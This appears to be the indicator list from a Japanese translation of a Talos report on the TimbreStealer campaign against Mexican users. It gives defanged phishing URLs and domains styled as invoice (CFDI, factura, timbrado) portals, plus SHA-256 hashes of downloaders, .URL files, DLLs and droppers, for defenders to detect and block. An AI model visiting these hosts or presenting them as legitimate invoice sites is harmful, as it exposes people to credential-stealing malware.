hxxps://comprobante68[.]portafoliocfdi[.]com/seg_factura/58c0146a753186
hxxps://comprobante70[.]miramantolama[.]com/timbreDigital/18665ae0a7b9e1
hxxps://comprobante75[.]meinastrohoroskop[.]com/timbreDigital/bfa30824f1120b
hxxps://comprobante80[.]serragrandreunion[.]com/timbreDigital/bf4a8735ed3953
hxxps://comprobante91[.]servicioslocomer[.]online/timbreDigital/adb6403b186182
hxxps://comprobante93[.]venagard[.]com/cfdi/57880f98ef2b70
hxxps://cumplimiento19[.]altavista100[.]com/timbreDigital/dd141e683a3056
hxxps://cumplimiento35[.]solucionegos[.]top/factura/bde64155cabbe5
hxxps://cumplimiento39[.]meinastrohoroskop[.]com/seg_factura/d4e9d7823adff2
hxxps://cumplimiento43[.]commerxion[.]buzz/facdigital/1ac5acb1a5525b
hxxps://cumplimiento47[.]solucionegos[.]top/seg_factura/7fa6018dc9b68f
hxxps://cumplimiento48[.]callarlene[.]net/seg_factura/c19a0dd4addc3e
hxxps://cumplimiento56[.]timbradoelectronico[.]com/facdigital/dd37434dcde7ad
hxxps://cumplimiento72[.]serragrandreunion[.]com/seg_factura/92cd2425a6c150
hxxps://cumplimiento81[.]paulfenelon[.]com/cfdi/20149ee8e1d3b2
hxxps://cumplimiento91[.]miramantolama[.]com/seg_factura/e907d32bf0d056
hxxps://cumplimiento94[.]meinastrohoroskop[.]com/cfdi/bd56529f9d1411
hxxps://cumplimiento98[.]serragrandreunion[.]com/factura/3f209bc16cbb9a
hxxps://factura10[.]miramantolama[.]com/factura/039d9cbaeec9b5
hxxps://factura20[.]facturascorporativas[.]com/seg_factura/9622cf8c695873
hxxps://factura20[.]solunline[.]top/cfdi/6401eac16211b2
hxxps://factura34[.]changjiangys[.]net/facdigital/52490c838bd94f
hxxps://factura4[.]servicioslocomer[.]online/cfdi/f2369d09a54ad9
hxxps://factura40[.]miramantolama[.]com/cfdi/9318466130e6af
hxxps://factura44[.]servicioslocales[.]online/cfdi/25e8a6f5393e1f
hxxps://factura46[.]facturasfiel[.]com/factura/021bd5fa122bb2
hxxps://factura49[.]marcialledo[.]com/factura/fc2cc5bf671dd0
hxxps://factura50[.]callarlene[.]net/cfdi/867d138f26fb23
hxxps://factura59[.]altavista100[.]com/seg_factura/0179ae05a51830
hxxps://factura7[.]taoshome4sale[.]com/factura/eebf49f810a0a6
hxxps://factura71[.]servicioslomex[.]online/timbreDigital/5de7db415c7e8e
hxxps://factura72[.]serragrandreunion[.]com/seg_factura/728423dceff50c
hxxps://factura73[.]mariageorgina[.]com/cfdi/71deea8cdbcb10
hxxps://factura81[.]altavista100[.]com/factura/8421cd5cb1c8e4
hxxps://factura90[.]changjiangys[.]net/timbreDigital/029a6531330379
hxxps://factura91[.]servicioslocomer[.]online/timbreDigital/2952b54a9542f1
hxxps://folio24[.]serragrandreunion[.]com/seg_factura/548b685f48dd30
hxxps://folio24[.]spacefordailyrituals[.]com/facdigital/55ae12184283dc
hxxps://folio47[.]marcialledo[.]com/seg_factura/e6bab6d032e282
hxxps://folio53[.]mariageorgina[.]com/seg_factura/ca2fd939c046fa
hxxps://folio60[.]callarlene[.]net/seg_factura/367b377baf47e5
hxxps://folio75[.]taoshome4sale[.]com/cfdi/7482bf3f2690af
hxxps://folio75[.]venagard[.]com/cfdi/7718efe0fd3952
hxxps://folio76[.]miramantolama[.]com/cfdi/a74b25b75c7182
hxxps://folio83[.]altavista100[.]com/factura/20f00b7d569c85
hxxps://folio89[.]changjiangys[.]net/factura/b645784e80f71a
hxxps://folio90[.]servicioslocomer[.]online/facdigital/d1950dc8f24757
hxxps://folio99[.]solunline[.]top/facdigital/b7928d4e0eade5
hxxps://pdf21[.]changjiangys[.]net/cfdi/2f99e7adf61c47
hxxps://pdf33[.]venagard[.]com/timbreDigital/91849e7d9fe4ad
hxxps://pdf34[.]solucionpiens[.]top/seg_factura/2dfed5bc7fcbf6
hxxps://pdf39[.]facturasonlinemx[.]com/seg_factura/66971f3669145a
hxxps://pdf49[.]marcialledo[.]com/factura/729c18972d690c
hxxps://pdf50[.]changjiangys[.]net/factura/cdb5ed3876c4bf
hxxps://pdf57[.]visual8298[.]top/factura/5239e15a8324ab
hxxps://pdf59[.]venagard[.]com/cfdi/5791bf23c6929e
hxxps://pdf63[.]paulfenelon[.]com/timbreDigital/3ae250718da0ca
hxxps://pdf65[.]verificatutramite[.]com/facdigital/e1ec8098e50a0b
hxxps://pdf70[.]mariageorgina[.]com/cfdi/fab1264f158f44
hxxps://pdf81[.]photographyride[.]com/seg_factura/4eb3832fe6d1bd
hxxps://pdf85[.]miramantolama[.]com/factura/74f871b7ca1977
hxxps://pdf93[.]venagard[.]com/factura/f24a53f8932b3f
hxxps://pdf98[.]solunline[.]top/timbreDigital/f57e558c31a86e
hxxps://portal27[.]marcialledo[.]com/timbreDigital/f8a5f05b3c1651
hxxps://portal34[.]solunline[.]top/cfdi/a068bb0da7eea1
hxxps://portal48[.]solucionpiens[.]top/timbreDigital/15ec5fc2aaf26a
hxxps://portal50[.]solucionegos[.]top/factura/8d4c6f7e2a4c7f
hxxps://portal55[.]solucionegos[.]top/seg_factura/f5f59070b20629
hxxps://portal63[.]paulfenelon[.]com/seg_factura/77907fa76c7c59
hxxps://portal70[.]solunline[.]top/timbreDigital/92b380d91a67a0
hxxps://portal80[.]changjiangys[.]net/cfdi/2224782a3b7f1d
hxxps://portal86[.]serragrandreunion[.]com/facdigital/68da4282591283
hxxps://portal90[.]meinastrohoroskop[.]com/factura/64f247c6238c38
hxxps://portal92[.]solucionpiens[.]top/timbreDigital/34893de446d532
hxxps://suscripcion0[.]venagard[.]com/timbreDigital/5c86c63ca1ffda
hxxps://suscripcion10[.]solunline[.]xyz/facdigital/ebe0cb51090e51
hxxps://suscripcion24[.]facturasonlinemx[.]com/factura/d6a6f8208ed508
hxxps://suscripcion24[.]venagard[.]com/timbreDigital/50c6f1fad17f5e
hxxps://suscripcion32[.]servicioslocomer[.]online/facdigital/22ccd8880c217e
hxxps://suscripcion38[.]eagleservice[.]buzz/cfdi/6dadfe1a18cffc
hxxps://suscripcion38[.]mariageorgina[.]com/factura/9c787623800b5e
hxxps://suscripcion57[.]changjiangys[.]net/factura/22ad73593f724a
hxxps://suscripcion65[.]g1ooseradas[.]buzz/factura/9f03d9ef3d73b5
hxxps://suscripcion84[.]taoshome4sale[.]com/cfdi/e4af3e6e22a8a6
hxxps://suscripcion95[.]servicioslomex[.]online/cfdi/0faa4a21fff2bb
hxxps://timbrado0[.]meinastrohoroskop[.]com/cfdi/515c9b9087c737
hxxps://timbrado11[.]verificatutramite[.]com/facdigital/f7640878ebc0f9
hxxps://timbrado16[.]taoshome4sale[.]com/timbreDigital/259029c9d7f330
hxxps://timbrado17[.]marcialledo[.]com/factura/2ea580ee99d5f1
hxxps://timbrado17[.]mariageorgina[.]com/seg_factura/95a6c2c0e004d8
hxxps://timbrado2[.]serviciosna[.]top/facdigital/c5cb33d68be323
hxxps://timbrado2[.]solucionegos[.]top/seg_factura/7c867709e85c67
hxxps://timbrado33[.]meinastrohoroskop[.]com/timbreDigital/aaf2cc575db42c
hxxps://timbrado42[.]mariageorgina[.]com/facdigital/f0f82ab0c87b32
hxxps://timbrado54[.]changjiangys[.]net/cfdi/04e4e38338d82a
hxxps://timbrado6[.]meinastrohoroskop[.]com/cfdi/5290b37e80850a
hxxps://timbrado73[.]mariageorgina[.]com/timbreDigital/ff862f9245e8b6
hxxps://timbrado74[.]callarlene[.]net/timbreDigital/eb52e334a2c0b3
hxxps://timbrado74[.]mexicofacturacion[.]com/factura/14fcb6e3eaf351
hxxps://timbrado80[.]paulfenelon[.]com/timbreDigital/684bc3f7d7e7f9
hxxps://timbrado84[.]miramantolama[.]com/cfdi/18864dcecc9e9c
hxxps://timbrado90[.]porcesososo[.]online/factura/cde31eb6fcac1d
hxxps://timbrado96[.]paulfenelon[.]com/facdigital/ef18828525a8fb
hxxps://validacion22[.]hb56[.]cc/seg_factura/8f845f6ba70820
hxxps://trilivok[.]com/2ysz0gghg/cbt0mer/it.php?f=2&w=Windows%2010
hxxps://trilivok[.]com/3s9p2w9yy/bvhcc5x/it.php?f=9&w=Windows%2010
hxxps://chidoriland[.]com/1r49ucc73/hs4q07q/it.php?f=2&w=Windows%2010
hxxps://manderlyx[.]com/cruto/it.php?f=2&w=Windows%2010
hxxps://bailandolambada[.]com/5iplivg7q/gn4md5c/it.php?f=2&w=Windows%2010
ドメイン
trilivok[.]com
chidoriland[.]com
manderlyx[.]com
bailandolambada[.]com
0[.]solucionegos[.]top
auditoria38[.]meinastrohoroskop[.]com
auditoria42[.]altavista100[.]com
auditoria67[.]mariageorgina[.]com
auditoria7[.]miramantolama[.]com
auditoria82[.]taoshome4sale[.]com
auditoria84[.]meinastrohoroskop[.]com
auditoria88[.]mariageorgina[.]com
auditoria89[.]venagard[.]com
auditoria92[.]venagard[.]com
auditoria93[.]serragrandreunion[.]com
comprobante14[.]miramantolama[.]com
comprobante2[.]marcialledo[.]com
comprobante27[.]mariageorgina[.]com
comprobante27[.]serragrandreunion[.]com
comprobante27[.]servicioslocomer[.]online
comprobante45[.]altavista100[.]com
comprobante51[.]meinastrohoroskop[.]com
comprobante63[.]serragrandreunion[.]com
comprobante68[.]portafoliocfdi[.]com
comprobante70[.]miramantolama[.]com
comprobante75[.]meinastrohoroskop[.]com
comprobante80[.]serragrandreunion[.]com
comprobante91[.]servicioslocomer[.]online
comprobante93[.]venagard[.]com
cumplimiento19[.]altavista100[.]com
cumplimiento35[.]solucionegos[.]top
cumplimiento39[.]meinastrohoroskop[.]com
cumplimiento43[.]commerxion[.]buzz
cumplimiento47[.]solucionegos[.]top
cumplimiento48[.]callarlene[.]net
cumplimiento56[.]timbradoelectronico[.]com
cumplimiento72[.]serragrandreunion[.]com
cumplimiento81[.]paulfenelon[.]com
cumplimiento91[.]miramantolama[.]com
cumplimiento94[.]meinastrohoroskop[.]com
cumplimiento98[.]serragrandreunion[.]com
factura10[.]miramantolama[.]com
factura20[.]facturascorporativas[.]com
factura20[.]solunline[.]top
factura34[.]changjiangys[.]net
factura4[.]servicioslocomer[.]online
factura40[.]miramantolama[.]com
factura44[.]servicioslocales[.]online
factura46[.]facturasfiel[.]com
factura49[.]marcialledo[.]com
factura50[.]callarlene[.]net
factura59[.]altavista100[.]com
factura7[.]taoshome4sale[.]com
factura71[.]servicioslomex[.]online
factura72[.]serragrandreunion[.]com
factura73[.]mariageorgina[.]com
factura81[.]altavista100[.]com
factura90[.]changjiangys[.]net
factura91[.]servicioslocomer[.]online
folio24[.]serragrandreunion[.]com
folio24[.]spacefordailyrituals[.]com
folio47[.]marcialledo[.]com
folio53[.]mariageorgina[.]com
folio60[.]callarlene[.]net
folio75[.]taoshome4sale[.]com
folio75[.]venagard[.]com
folio76[.]miramantolama[.]com
folio83[.]altavista100[.]com
folio89[.]changjiangys[.]net
folio90[.]servicioslocomer[.]online
folio99[.]solunline[.]top
pdf21[.]changjiangys[.]net
pdf33[.]venagard[.]com
pdf34[.]solucionpiens[.]top
pdf39[.]facturasonlinemx[.]com
pdf43[.]marcialledo[.]com
pdf49[.]marcialledo[.]com
pdf50[.]changjiangys[.]net
pdf57[.]visual8298[.]top
pdf59[.]venagard[.]com
pdf63[.]paulfenelon[.]com
pdf65[.]verificatutramite[.]com
pdf70[.]mariageorgina[.]com
pdf81[.]photographyride[.]com
pdf85[.]miramantolama[.]com
pdf93[.]venagard[.]com
pdf98[.]solunline[.]top
portal27[.]marcialledo[.]com
portal34[.]solunline[.]top
portal48[.]solucionpiens[.]top
portal50[.]solucionegos[.]top
portal55[.]solucionegos[.]top
portal63[.]paulfenelon[.]com
portal70[.]solunline[.]top
portal80[.]changjiangys[.]net
portal86[.]serragrandreunion[.]com
portal90[.]meinastrohoroskop[.]com
portal92[.]solucionpiens[.]top
suscripcion0[.]venagard[.]com
suscripcion10[.]solunline[.]xyz
suscripcion24[.]facturasonlinemx[.]com
suscripcion24[.]venagard[.]com
suscripcion32[.]servicioslocomer[.]online
suscripcion38[.]eagleservice[.]buzz
suscripcion38[.]mariageorgina[.]com
suscripcion57[.]changjiangys[.]net
suscripcion65[.]g1ooseradas[.]buzz
suscripcion84[.]taoshome4sale[.]com
suscripcion95[.]servicioslomex[.]online
timbrado0[.]meinastrohoroskop[.]com
timbrado11[.]verificatutramite[.]com
timbrado16[.]taoshome4sale[.]com
timbrado17[.]marcialledo[.]com
timbrado17[.]mariageorgina[.]com
timbrado2[.]serviciosna[.]top
timbrado2[.]solucionegos[.]top
timbrado33[.]meinastrohoroskop[.]com
timbrado42[.]mariageorgina[.]com
timbrado54[.]changjiangys[.]net
timbrado6[.]meinastrohoroskop[.]com
timbrado73[.]mariageorgina[.]com
timbrado74[.]callarlene[.]net
timbrado74[.]mexicofacturacion[.]com
timbrado80[.]paulfenelon[.]com
timbrado84[.]miramantolama[.]com
timbrado90[.]porcesososo[.]online
timbrado96[.]paulfenelon[.]com
validacion22[.]hb56[.]cc
JavaScript ファイル
600d085638335542de1c06a012ec9d4c56ffe0373a5f61667158fc63894dde9f (ダウンローダー)
883674fa4c562f04685a2b733747e4070fe927e1db1443f9073f31dd0cb5e215 (地域の確認とリダイレクト)
.URL ファイル
b1b85c821a7f3b5753becbbfa19d2e80e7dcbd5290d6d831fb07e91a21bdeaa7 CFDI_930209.zip
e04cee863791c26a275e0c06620ea7403c736f8cafbdda3417f854ae5d81a49f FACTURA_560208.zip
aa187a53e55396238e97638032424d68ba2402259f2b308c9911777712b526af FAC_560208_ATR890126GK2.url_
66af21ef63234c092441ec33351df0f829f08a2f48151557eb7a084c6275b791 FAC_930209_FME140910KI4.url_
埋め込まれたバイナリ
b3f4b207ee83b748f3ae83b90d1536f9c5321a84d9064dc9745683a93e5ec405 Cecujujajofubo475.dll_
e87325f4347f66b21b19cfb21c51fbf99ead6b63e1796fcb57cd2260bd720929 blob.dll_
103d3e03ce4295737ef9b2b9dfef425d93238a09b1eb738ac0e05da0c6c50028 blob.dll_
a579bd30e9ee7984489af95cffb2e8e6877873fd881aa18d7f5a2177d76f7bf2 blob.dll
b01e917dd14c780cb52cafcd14e4dd499c33822c7776d084d29cf5e0bb0bddb6 blob.dll_
795c0b82b37d339ea27014d73ad8f2d28c5066a7ceb6a2aa0d74188df9c311c9 blob.dll_
07521bd6acf725b8a33d1d91fd0cc7830d2cff66abdb24616c2076b63d3f36a8 blob.dll_
71ce48c89b22e99356c464c1541e2d7b9419a2c8fe8f6058914fc58703ba244f blob.dll_
ba7bc4cff098f49d39e16c224e001bd40a5d08048aeec531f771a54ee4a5ecef blob.dll_
ドロッパーバイナリ
010b48762a033f91b32e315ebcefb8423d2b20019516fa8f2f3d54d57d221bdb
024f3c591d44499afb8f477865c557fc15164ab0f35594e0cfdfa76245459762
03cd17df83a7bdf459f16677560e69143d1788ce1fc7927200a09f82859d90ea
075910c802f755d3178a8f1f14ee4cd7924fd4463c7491277bdf2681b16e593c
12bff33da7d9807252bb461d65828154b9b5b1dca505e8173893e3d410d40dd0
1aaa4fb29a88c83495de80893cd2476484af561bb29e8cdfc73ce38f6cd61a84
23b9e4103141d6a898773b1342269334e569bcf576cdcb4a905f24e26320cdab
27c1e41fde9bc0d5027a48ccada1af8c9c8f59937bf5f77edd21e49bd28f29a2
2a225784289f31adbaa8be0b8770495fa8950fce2b7352a0c7a566fc79067547
2a38b75e88f91f9cd28ef478e82c3b44f50e57cb958ba63e58f134d8bd368812
2a3f869e9e78b4d7945a60ceec27586c07bc8b0770be64463358fffe3b6b7395
2e04c36b7ddd6939b7bef258bfeba6f91a5c37a43389dd6d9a88eff5863df5ed
43e99539e4b966dde2f9de8dc1ffb4a22bc560e54c01de9aef6b15fac1412714
46226d4fb7ffe15ba8167e3724f991c543731672e19ef40bb43fddc6df648d0a
46cc07a9287da26e238a74734d87e0aae984f4648a80a26547afa0de8c850afb
51be3a3b4ebd15c305c0f9b57388c449f88f0d6d2d46a0a838f046f0fd21b78f
55b0247b9b574978a4c9abd19c3bcc04ea78598398b9f8aeb35bd51cbd877576
56612bb0ab00cbb7af24326b027a55ff25852ddab1f1c8e24471b7ce97003505
5831f4f8ce715d4a021284e68af1b6d8040a2543484ac84b326eea20c543552e
58562e49c1612f08e56e7d7b3ca6cd78285948018b2998e45bd425b4c79ce1f4
62495620b0d65d94bc3d68dec00ffbe607eacd20ab43dc4471170aa292cc9b1a
682546addb38a938982f0f715b27b4ba5cda4621e63f872f19110d174851c4e9
69019b7b64deb5cc91a58b6a3c5e6b1b6d6665bd40be1381a70690ba2b305790
6bf082f001f914824a6b33f9bdd56d562c081097692221fb887035e80926d583
7923d409959acffab49dda63c7c9c15e1bdd2b5c16f7fcfe8ef3e3108e08df87
7ac22989021082b9a377dcc582812693ce0733e973686b607e8fc2b52dcf181d
8420d77ba61925b03a1ad6c900a528ecacbb2c816b3e6bc62def40fc14e03b78
850dd47a0fb5e8b2b4358bf3aa1abd7ebaae577b6fc4b6b4e3d7533313c845b8
96363b2b9e4ed8044cb90b6619842ba8897b4392f9025cbfdccfda1ea7a14a58
97157c8bbeb8769770c4cb2201638d9ad0103ba2fdfed9bdbd03c53bd7a5fcb9
a103b0c604ef32e7aabb16c2a7917fd123c41486d8e0a4f43dcf6c48d76de425
a82fb82f3aa2f6123d2c0fb954ae558ac6e8862ef756b12136fbe8d533b30573
a92934c014a7859bd122717f4c87f6bd31896cb87d28c9fac1a6af57ff8110f6
ab2a2465fccd7294580c11492c29a943c54415e0c606f41e08ce86d69e254ee4
ababe815e11b762089180e5fb0b1eaffa6a035d630d7aaf1d8060bd5d9a87ea5
b04a0a4a1520c905007a5d370ed2b6c7cb42253f4722cc55a9e475ae9ece1de7
c29b9f79b0a34948bde1dfca3acecca6965795917c7d3444fcacba12f583fb98
c99237a5777a2e8fa7da33460a5b477d155cc26bc2e297a8563516a708323ead
ca652fc3a664a772dbf615abfe5df99d9c35f6a869043cf75736e6492fbd4bea
b5a272acd842154b2069b60aab52568bbfde60e59717190c71e787e336598912
5efa99b3cb17bec76fec2724bcfcc6423d0231bba9cf9c1aed63005e4c3c2875
ce135a7e0410314126cacb2a2dba3d6d4c17d6ee672c57c097816d64eb427735
d3ff98b196717e66213ccf009cbeed32250da0e2c2748d44f4ee8fb4f704407c
35b7dd775db142699228d3e64ee8e9a02c6d91bb49f7c2faf367df8ba2186fd6
e65e25aee5947747f471407a6cce9137695e4fee820f990883b117726195988c
e8ed09b016ea62058404c482edf988f14a87c790d5c9bd3d2e03885b818ef822
febf9c5ede3964fdb3b53307a3d5ef7b0e222705a3bb39bef58e28aaba5eed28
ff3769c95b8a5cdcba750fda5bbbb92ef79177e3de6dc1143186e893e68d45a4
本稿は 2024 年 02 月 27 日に Talos Group のブログに投稿された「TimbreStealer campaign targets Mexican users with financial lures」の抄訳です。